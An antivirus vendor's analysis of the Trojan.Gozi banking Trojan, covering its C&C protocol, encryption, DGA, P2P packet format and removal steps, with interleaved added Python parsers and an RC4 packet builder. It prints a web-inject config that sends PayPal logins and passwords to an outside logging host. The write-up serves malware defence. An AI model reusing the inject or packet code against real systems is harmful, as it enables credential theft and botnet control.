Trojan.Gozi

Added to the Dr.Web virus database: 2016-03-18

SHA1 (P2P version): 0fb30e03f71f0a20340ca0cb634e6250c14a1109
SHA1 (installer): 1720115a8a646f4a0a3741cec7266b82ff065a7e
SHA1 (client.dll, x32): 0690ef42ff894dd85be873b4d95183a1af5f9a72
SHA1 (client.dll, x64): 2d9cb08d9f4ed28c55a93355c7e5ae39b1f43488
SHA1 (vnc32): 3bb13d9d4b4eaabb314d90d294119d2f982736ac
SHA1 (vnc64): 17930b20f98ac7e92d28598901710254f1cf6315

A modified version of a well-known banking Trojan, able to build a P2P botnet. It can perform the following functions:

  • Steals login credentials from web forms (form grabbing)
  • Logs keystrokes on the infected computer (keylogging)
  • Injects arbitrary content into web pages loaded in the browser (web injects)
  • Provides remote access to the computer's desktop over Virtual Network Computing (VNC)
  • Starts a SOCKS proxy server on command
  • Downloads and installs plug-ins

To communicate with its server, the Trojan uses HTTP. The transmitted data is encrypted and embedded in the path of a GET request, which looks as follows:

http://made****h.pw/images/EYI/uE4P5lkUATTfrO/L4Iv7VEvWWlYBM9qKuE67ixOoebU1ef9HHS7Xvwhns0obfoegeauxh8PajwSUrNkSFTtqnU/Fy/MyNURytngSxc_2FYvcf9O98PFCv2bBHEE//jMiPVxyqqgQ/f_2/FBgMUnmhszPJ5_2BuSA.gif

After decryption, the following string is obtained:

jkwerhw=sdalfwewesd3&server=12&crc=7b033&version=214721&user=55deba95d542febdab0e1570986cdaf0&soft=1&id=1045

Where:
server, id—taken from the Trojan's configuration;
user—unique bot identifier;
crc—CRC32 of the configuration (if no configuration is present, the value is taken from GetTickCount).

The Trojan sends requests to several kinds of server-side script, distinguished by the extension in the request path:

  • .jpeg—request for the web injection configuration;
  • .gif—request for a personal task;
  • .bmp—upload of logs to the server; the data is sent as multipart/form-data.

The server's response is encrypted with RSA, Serpent and XOR. If the message contains web injection data, it is additionally compressed with aPLib. Such messages consist of a sequence of blocks:

struct block_t
{
    DWORD size;
    BYTE data[size]; // NUL-terminated string
}
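The block_t layout above is easy to walk, and the points worth getting right are the two length checks. The following is an added example (not code from this page or from the Trojan): it builds a constructed buffer of three blocks from strings of the PayPal inject shown on this page, then splits a decrypted message into strings, rejecting a block whose size field runs past the end of the data or whose data is not NUL-terminated instead of silently misparsing it.

```python
import struct


def _block(s: str) -> bytes:
    """Encode one block_t: DWORD size followed by `size` bytes ending in a NUL."""
    data = s.encode() + b"\x00"
    return struct.pack("<I", len(data)) + data


# Constructed test input (not a captured message): three blocks using strings
# from the PayPal inject example on this page.
SAMPLE = _block("*paypal.*") + _block('id="js_transactionCollection"') + _block("Order")


def parse_blocks(buf: bytes) -> list:
    """Split a decrypted (and, for web injects, aPLib-decompressed) message into its strings."""
    out = []
    off = 0
    while off < len(buf):
        if off + 4 > len(buf):
            raise ValueError(f"truncated size field at offset {off:#x}")
        (size,) = struct.unpack_from("<I", buf, off)
        off += 4
        # The size field is attacker-controlled data: bound it before slicing.
        if size == 0 or off + size > len(buf):
            raise ValueError(
                f"block at offset {off - 4:#x} claims {size} bytes, {len(buf) - off} remain")
        data = buf[off:off + size]
        if data[-1] != 0:
            raise ValueError(f"block at offset {off - 4:#x} is not NUL-terminated")
        out.append(data[:-1].decode("latin-1"))
        off += size
    return out


if __name__ == "__main__":
    for line in parse_blocks(SAMPLE):
        print(line)
```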

An example of a web injection into the PayPal webpage:

*paypal.*
id="js_transactionCollection"
id="js_transactionCollection" style="visibility:hidden"
...
Order
*paypal.com/*/cgi-bin/merchantpaymentweb*
PROCESS
check.unitssl.com/log.php?action=log&text=pp;l=@login@;p=@pass@&botid=@ID@
*paypal.com/*/cgi-bin/merchantpaymentweb*
POST
login_email
login
*paypal.com/*/cgi-bin/merchantpaymentweb*
POST
login_password
pass

The Trojan keeps a directory of its embedded configuration data inside the executable. In the sample it immediately follows the last section header (.reloc), and its entries point into that section:

2E 72 65 6C-6F 63 00 00-00 30 00 00-00 10 02 00  .reloc...0......
00 26 00 00-00 D8 01 00-00 00 00 00-00 00 00 00  .&..............
00 00 00 00-40 00 00 40-00 00 00 00-00 00 00 00  ....@..@........
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
4A 31 00 00-00 32 02 00-84 00 00 00-64 5E 28 E1  J1...2......d^(.
00 01 01 00-4A 31 00 00-00 34 02 00-81 01 00 00  ....J1...4......
CB AF 22 D7-00 20 01 00-00 00 00 00-00 00 00 00  ..".. ..........
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................
00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 00  ................

The directory is located by searching for the 0x314A marker; each entry has the following layout:

struct config_block_t
{
  WORD magic;              // 0x314A
  WORD numHashes;
  DWORD pos;               // RVA of the configuration data
  DWORD size;              // size of the configuration data
  DWORD id;                // configuration ID
  DWORD flag;              // 0x10000: data is aPLib-compressed
  DWORD hashes[numHashes];
};
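As an added example (not code from this page or from the Trojan), the following Python walks this directory. It transcribes the bytes of the hex dump above as its test input, parses the .reloc section header that precedes the descriptors, reads consecutive config_block_t entries from the first 0x314A marker until the marker is no longer present, reports whether the aPLib flag is set, and maps each pos RVA to a file offset inside the section. Field names follow the struct above; treating the entries as contiguous and the pos field as an RVA into the section are this example's assumptions, as is the stop condition.

```python
import struct

MAGIC = 0x314A                    # "J1" marker that opens every config_block_t
FLAG_APLIB = 0x10000              # configuration data is aPLib-compressed
SECTION_HEADER = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes

# Bytes transcribed from the hex dump above: the .reloc section header, zero
# padding, then two descriptors. Built here as test input, not read from a file.
DUMP = bytes.fromhex(
    "2E72656C6F6300000030000000100200"
    "0026000000D801000000000000000000"
    "00000000400000400000000000000000"
    + "00" * 32
    + "4A31000000320200" "84000000645E28E1"
    + "000101004A310000" "0034020081010000"
    + "CBAF22D700200100" "0000000000000000"
    + "00" * 96
)


def parse_section_header(data: bytes, off: int = 0) -> dict:
    """Read the IMAGE_SECTION_HEADER at `off` (only the fields needed here are kept)."""
    name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
        SECTION_HEADER, data, off)
    return {"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
            "raw_ptr": raw_ptr, "raw_size": raw_size, "characteristics": chars}


def rva_to_offset(rva: int, sec: dict):
    """Map an RVA to a file offset if it lies inside the given section, else None."""
    if sec["va"] <= rva < sec["va"] + sec["vsize"]:
        return rva - sec["va"] + sec["raw_ptr"]
    return None


def parse_config_directory(data: bytes) -> list:
    """Walk consecutive config_block_t entries starting at the first 0x314A marker."""
    off = data.find(struct.pack("<H", MAGIC))
    if off < 0:
        return []
    entries = []
    while off + 20 <= len(data):
        magic, n_hashes, pos, size, cfg_id, flag = struct.unpack_from("<HHIIII", data, off)
        if magic != MAGIC:
            break                       # assumption: the directory ends at the first non-marker word
        off += 20
        if off + 4 * n_hashes > len(data):
            raise ValueError(f"descriptor at {off - 20:#x} declares {n_hashes} hashes past end of data")
        hashes = list(struct.unpack_from(f"<{n_hashes}I", data, off))
        off += 4 * n_hashes
        entries.append({"pos": pos, "size": size, "id": cfg_id, "flag": flag,
                        "compressed": bool(flag & FLAG_APLIB), "hashes": hashes})
    return entries


def locate_configs(data: bytes) -> list:
    """Descriptors plus the file offset of each configuration inside the preceding section."""
    sec = parse_section_header(data)
    return [dict(e, section=sec["name"], file_offset=rva_to_offset(e["pos"], sec))
            for e in parse_config_directory(data)]


if __name__ == "__main__":
    for e in locate_configs(DUMP):
        print(f"id={e['id']:#010x} rva={e['pos']:#x} size={e['size']:#x} "
              f"aplib={e['compressed']} file_offset={e['file_offset']:#x}")
```

For the dump on this page both entries carry the 0x10000 bit, so the data at the two RVAs must be aPLib-decompressed before it is read as the parameter list shown below.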

If that flag is set, the retrieved data is unpacked with aPLib. The unpacked configuration, with its associated parameters, looks as follows:

{"GROUP": "1045", "1481529637": "10", "SENDTIMEOUT": "200", "BCTIMEOUT": "10",
"CONFIGFAILTIMEOUT": "200", "TASKTIMEOUT": "200", "DGA_SEED": "1", "HOSTS": "127.0.0.1",
"SERVERKEY": "87654321POIUYTRE", "SERVER": "12", "KNOCKERTIMEOUT": "200",
"CONFIGTIMEOUT": "200", "287775871": "1"}

Where:

GROUP—the id parameter in the request, SERVER—the server parameter in the request;
DGA_SEED—initialisation constant of the DGA;
SERVERKEY—key for Serpent;
HOSTS—space-separated list of C&C servers.

Trojan.Gozi employs a domain generation algorithm (DGA). For this purpose the Trojan downloads a text file from a NASA server:

http://nssdc.gsfc.nasa.gov/planetary/text/pioneer-11_endops.txt

Using words from that text file together with the current date and the DGA_SEED value from its configuration, the Trojan generates the domain name of the C&C server. The generated control server address changes every 15 days. All transferred information is encrypted.

To build the P2P botnet, a Kademlia-based protocol is used. UDP packets are encrypted with RC4 and have the following structure:

struct kad_t
{
    BYTE flag;                 // random value, except the two lowest bits:
                               //   bit 0 - packet is encrypted with sendKey;
                               //   bit 1 - (1) sendKey = 0, (0) sendKey = nid1^nid2^nid3^nid4
    DWORD rndKey;              // random component of the key
    kad_transport_t transport; // encrypted
    kad_head_t head;           // encrypted
    BYTE data[];               // encrypted
}

struct kad_transport_t
{
    DWORD magic;   // 0x395F2EC1
    DWORD sendKey; // random value used to encrypt responses
    DWORD recvKey;
}

struct kad_head_t
{
    BYTE opType; // 0xe4 - UDP KAD
    BYTE op;     // protocol command
    WORD size;   // length of kad_t.data
};
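The framing can be exercised end to end. The following is an added example, not the Trojan's code and not from this page: it implements RC4 and the kad_t, kad_transport_t and kad_head_t serialisation with the constants above, picks the 32-bit key component from the two low bits of flag as the struct comment describes, and validates magic, opType and size on receipt so that a packet decrypted with the wrong key is rejected. The page does not say how rndKey is combined with that 32-bit key, so concatenating the two DWORDs is this example's assumption, as are the node IDs, keys and payloads used in demo().

```python
import os
import struct
from functools import reduce
from typing import Optional

KAD_MAGIC = 0x395F2EC1     # kad_transport_t.magic
OPTYPE_UDP_KAD = 0xE4      # kad_head_t.opType
FLAG_USE_SENDKEY = 0x01    # kad_t.flag bit 0: encrypted with the peer's sendKey
FLAG_ZERO_KEY = 0x02       # kad_t.flag bit 1: sendKey = 0 (set) / nid1^nid2^nid3^nid4 (clear)


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA); the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(c ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def session_key(flag: int, peer_send_key: int, node_ids) -> int:
    """Choose the 32-bit key component announced by the two low bits of kad_t.flag."""
    if flag & FLAG_USE_SENDKEY:
        return peer_send_key
    if flag & FLAG_ZERO_KEY:
        return 0
    return reduce(lambda a, b: a ^ b, node_ids)


def rc4_key(rnd_key: int, key32: int) -> bytes:
    # ASSUMPTION: the page only calls rndKey "the random component of the key" and does
    # not say how it is combined with sendKey; concatenating both DWORDs is illustrative.
    return struct.pack("<II", rnd_key, key32)


def build_packet(op: int, payload: bytes, *, flag: int, key32: int, send_key: int,
                 recv_key: int, rnd_key: Optional[int] = None) -> bytes:
    """Serialise kad_t: plaintext flag and rndKey, then RC4(transport || head || data)."""
    if rnd_key is None:
        (rnd_key,) = struct.unpack("<I", os.urandom(4))
    transport = struct.pack("<III", KAD_MAGIC, send_key, recv_key)
    head = struct.pack("<BBH", OPTYPE_UDP_KAD, op, len(payload))
    body = rc4(rc4_key(rnd_key, key32), transport + head + payload)
    return struct.pack("<BI", flag & 0xFF, rnd_key) + body


def parse_packet(pkt: bytes, peer_send_key: int, node_ids) -> dict:
    """Decrypt and validate a received kad_t; raise ValueError on anything malformed."""
    if len(pkt) < 5 + 12 + 4:
        raise ValueError("packet shorter than kad_t + transport + head")
    flag, rnd_key = struct.unpack_from("<BI", pkt, 0)
    plain = rc4(rc4_key(rnd_key, session_key(flag, peer_send_key, node_ids)), pkt[5:])
    magic, send_key, recv_key = struct.unpack_from("<III", plain, 0)
    if magic != KAD_MAGIC:
        raise ValueError(f"bad transport magic {magic:#010x} (wrong key?)")
    op_type, op, size = struct.unpack_from("<BBH", plain, 12)
    if op_type != OPTYPE_UDP_KAD:
        raise ValueError(f"unexpected opType {op_type:#04x}")
    data = plain[16:]
    if len(data) != size:
        raise ValueError(f"head.size={size} but {len(data)} data bytes follow")
    return {"flag": flag, "op": op, "send_key": send_key, "recv_key": recv_key, "data": data}


# Constructed demo values (not from a capture): four node-ID DWORDs whose XOR is 0xFFFFFFFF.
NODE_IDS = (0x11111111, 0x22222222, 0x44444444, 0x88888888)


def demo():
    """Request keyed by the node IDs (low bits clear), reply keyed by the request's sendKey."""
    req = build_packet(0x01, b"ping", flag=0xA8, key32=session_key(0xA8, 0, NODE_IDS),
                       send_key=0xDEADBEEF, recv_key=0xCAFEBABE, rnd_key=0x01020304)
    req_msg = parse_packet(req, peer_send_key=0, node_ids=NODE_IDS)
    rsp = build_packet(0x02, b"pong", flag=0x71, key32=req_msg["send_key"],
                       send_key=0x0BADF00D, recv_key=0xDEADBEEF, rnd_key=0x0A0B0C0D)
    rsp_msg = parse_packet(rsp, peer_send_key=0xDEADBEEF, node_ids=NODE_IDS)
    return req_msg, rsp_msg


if __name__ == "__main__":
    for m in demo():
        print(f"op={m['op']:#04x} sendKey={m['send_key']:#010x} data={m['data']!r}")
```

Only flag and rndKey travel in the clear, so a detection that matches on the 0x395F2EC1 magic has to decrypt first; the packet length (5 + 12 + 4 + size) and the fixed 0xE4 opType after decryption are the cheap sanity checks before anything in data is trusted.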

Received and downloaded files are stored at:

%APPDATA%\Microsoft\{%08X-%04X-%04X-%04X-%08X%04X}\<md5hashOfName>

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk, write it to a USB drive or burn it to a CD/DVD. After booting from this media, run a full scan and cure all the detected threats.
Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.